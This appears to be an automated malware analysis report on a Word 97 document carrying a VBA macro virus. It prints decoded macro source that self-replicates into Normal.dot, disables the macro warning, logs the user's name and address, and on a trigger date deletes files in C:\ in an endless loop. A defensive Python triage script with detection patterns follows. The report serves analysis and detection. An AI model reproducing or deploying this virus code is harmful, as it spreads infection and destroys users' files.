Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 82ccf8d6126d631c…

MALICIOUS

Office (OLE)

Size: 94.5 KB
Created: 2000-11-06 09:16:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 79b659983b3011405aa42792bf4e378c
SHA-1: 75d9f49ffe26ce04af6862a947c7958ef3c90b99
SHA-256: 82ccf8d6126d631ce92a34b37d5a7373e79a7b4e8bd844df440c4673fcc7ec78
Risk score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word document (Word 8.0, i.e. the Word 97 binary format) whose ThisDocument module carries a self-replicating VBA macro virus. A Document_Close handler, running under On Error Resume Next so that every failure is silent, uses the VBA Extensibility object model (ActiveDocument.VBProject.VBComponents and NormalTemplate.VBProject.VBComponents) to search both the open document and the Normal template for the marker string "Yugoslavia" with CodeModule.Find. The check at the top of the spreading branch is an Xor: when exactly one of the two modules carries the marker, and the document is saved as a .doc or .dot (wdFormatDocument or wdFormatTemplate), the whole code module is read with CodeModule.Lines and copied to the other side. Infection therefore moves from the document into Normal.dot and from there into every document the user subsequently closes. Before spreading it sets Options.VirusProtection = False, which turns off Word's macro warning. It also assembles a log block (time, date, Application.UserName, Application.UserAddress) as VBA comment lines prefixed with "' "; the comment line "' HANJUNG PRINTING.doc2000.11.06 ... \\SV085\pg082 - NE02:" repeated between every line of the preview is consistent with that logging from earlier infections, and the Korean token 오후 in it means "PM". A date-triggered payload fires on 22 February: Kill "C:\*.*" deletes the files in the root of drive C:, a message box titled "It's Murder" is shown, and GoTo Delivery jumps back to the same label, so the loop never exits. Note for reproduction: on current Word versions access to VBProject is refused unless "Trust access to the VBA project object model" is enabled, so under On Error Resume Next the replication step fails silently, whereas the Kill branch does not depend on VBProject access. The ClamAV detection Doc.Trojan.Marker-4 corroborates the verdict.

Heuristics (2)

  • ClamAV: Doc.Trojan.Marker-4 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Marker-4
  • VBA macros detected [medium, OLE_VBA_MACROS]
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 119919 bytes
SHA-256: 4c61571e9813ab1c80a32c2655a8f7a2b8fe5b7aeab8dc5cb25dc6861f8a564a
Detection
ClamAV: Doc.Trojan.Marker-4
Obfuscation or payload: unlikely (automated verdict; the code is plaintext VBA, but it does contain a date-triggered destructive branch, Kill "C:\*.*", see the preview below)
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Private Sub Document_Close()
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
On Error Resume Next
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Const from = "Yugoslavia" 'nuthin' to do with the GeNiUs just needed a marker
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Dim ad, nt As Object
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Dim rep, x As Integer
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Dim virusCode, UserAddress, LogData, LogFile As String
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
DocumentInfected = ad.codemodule.Find(from, 1, 1, 10000, 10000)
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
NormalTemplateInfected = nt.codemodule.Find(from, 1, 1, 10000, 10000)
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Options.VirusProtection = False
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Options.SaveNormalPrompt = True
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Delivery:
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
If Day(Now()) = 22 And Month(Now()) = 2 Then
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Kill "C:\*.*":
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
rep = MsgBox("That's Right", vbOK + vbCritical, "It's Murder")
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
GoTo Delivery
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
End If
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
If (DocumentInfected = True Xor NormalTemplateInfected = True) And (ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate) Then
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
If DocumentInfected = True Then
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
SaveNormalTemplate = NormalTemplate.Saved
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
virusCode = ad.codemodule.Lines(1, ad.codemodule.countoflines)
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
For i = 1 To Len(Application.UserAddress)
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
End If
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Else
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
UserAddress = UserAddress & Chr(13) & "' "
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
End If
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
Next i
' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:
LogData = Chr(13) & "' " & Format(Time, "hh:mm:ss AMPM -") & Format(Date, "dddd,d mmm,yyyy") & Chr(13) & "' " & Application.UserName & Chr(13) & "' " & UserAddress & Chr(13) & "' " & Appl
... (truncated)
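As an added example (not code from this report, from oletools or from the sample itself), the following Python script performs the triage an analyst would run over the extracted macros.bas: it strips the macro's own logged comment lines, which recur verbatim between every line of code, to recover the real source, then flags the behaviours visible in the preview, recovers the infection marker constant that CodeModule.Find searches for, and extracts the trigger date. The input is a constructed excerpt of the preview; the indicator names, the regular expressions and the verdict rule are this example's own assumptions, not a vendor taxonomy.

```python
"""Triage an extracted VBA module for macro-virus indicators.

Added example for this report, not part of any analysis tool. Indicator
names, patterns and the verdict rule are assumptions made for illustration.
"""
import re
from collections import Counter

# Constructed input: the comment line the macro logs into each infected
# module, interleaved with code lines copied from the preview above.
LOG_MARKER = r"' HANJUNG PRINTING.doc2000.11.06 오후 3:39:58\\SV085\pg082 - NE02:"
SAMPLE_VBA = "\n".join(
    line
    for code in [
        "Private Sub Document_Close()",
        "On Error Resume Next",
        'Const from = "Yugoslavia" \'nuthin\' to do with the GeNiUs just needed a marker',
        "Set ad = ActiveDocument.VBProject.VBComponents.Item(1)",
        "Set nt = NormalTemplate.VBProject.VBComponents.Item(1)",
        "DocumentInfected = ad.codemodule.Find(from, 1, 1, 10000, 10000)",
        "Options.VirusProtection = False",
        "If Day(Now()) = 22 And Month(Now()) = 2 Then",
        'Kill "C:\\*.*":',
        "GoTo Delivery",
        "End If",
        "virusCode = ad.codemodule.Lines(1, ad.codemodule.countoflines)",
        "End Sub",
    ]
    for line in (LOG_MARKER, code)
)

# VBA identifiers are case-insensitive ("codemodule" == "CodeModule"),
# so every pattern is compiled with re.IGNORECASE.
INDICATORS = {
    # reading or writing another module through VBA Extensibility
    "self_replication": r"\.VBProject\.VBComponents|\.CodeModule\.(Lines|Find|AddFromString|InsertLines|DeleteLines)",
    "normal_template_target": r"\bNormalTemplate\b",
    "auto_exec_handler": r"^\s*(Private\s+|Public\s+)?Sub\s+(Document_(Open|Close|New)|Auto(Open|Close|Exec|New|Exit))\b",
    "disable_macro_warning": r"Options\.VirusProtection\s*=\s*False",
    "wildcard_kill": r'\bKill\s+"[^"]*[*?]',
    "date_trigger": r"\b(Day|Month|Weekday)\s*\(\s*Now\s*\(\s*\)\s*\)\s*=",
    "error_suppression": r"\bOn\s+Error\s+Resume\s+Next\b",
}


def strip_repeated_comments(src, min_repeats=3):
    """Drop comment lines that recur verbatim (the macro's own log block)
    and blank lines; return (code_lines, sorted list of dropped markers)."""
    lines = [l.rstrip() for l in src.splitlines()]
    counts = Counter(l.strip() for l in lines if l.lstrip().startswith("'"))
    markers = {text for text, n in counts.items() if n >= min_repeats}
    code = [l for l in lines if l.strip() and l.strip() not in markers]
    return code, sorted(markers)


def find_indicators(code_lines):
    """Map indicator name -> 1-based line numbers (in the cleaned code)."""
    hits = {}
    for name, pattern in INDICATORS.items():
        rx = re.compile(pattern, re.IGNORECASE)
        where = [n for n, text in enumerate(code_lines, 1) if rx.search(text)]
        if where:
            hits[name] = where
    return hits


def infection_marker(code_lines):
    """Value of the string constant passed to CodeModule.Find, if any."""
    src = "\n".join(code_lines)
    consts = dict(re.findall(r'\bConst\s+(\w+)\s*=\s*"([^"]*)"', src, re.IGNORECASE))
    m = re.search(r"\.CodeModule\.Find\(\s*(\w+)\s*,", src, re.IGNORECASE)
    return consts.get(m.group(1)) if m else None


def trigger_date(code_lines):
    """(month, day) of a Day(Now()) = d And Month(Now()) = m check, or None."""
    src = "\n".join(code_lines)
    m = re.search(
        r"Day\s*\(\s*Now\s*\(\s*\)\s*\)\s*=\s*(\d+)\s+And\s+"
        r"Month\s*\(\s*Now\s*\(\s*\)\s*\)\s*=\s*(\d+)",
        src, re.IGNORECASE)
    return (int(m.group(2)), int(m.group(1))) if m else None


def verdict(hits):
    """Assumed rule: copying modules from an auto-executing handler is a virus."""
    if "self_replication" in hits and "auto_exec_handler" in hits:
        return "macro virus"
    return "suspicious macro" if hits else "no indicators"


def triage(src):
    code, markers = strip_repeated_comments(src)
    hits = find_indicators(code)
    return {
        "code_lines": len(code),
        "log_markers": markers,
        "indicators": hits,
        "infection_marker": infection_marker(code),
        "trigger_date": trigger_date(code),
        "verdict": verdict(hits),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

To run it on the real artifact, replace SAMPLE_VBA with the contents of macros.bas; the Attribute header lines that olevba keeps match none of the patterns and pass through harmlessly. The repeated-comment threshold is deliberately low, since a module that has been through several infection rounds accumulates many copies of the log block.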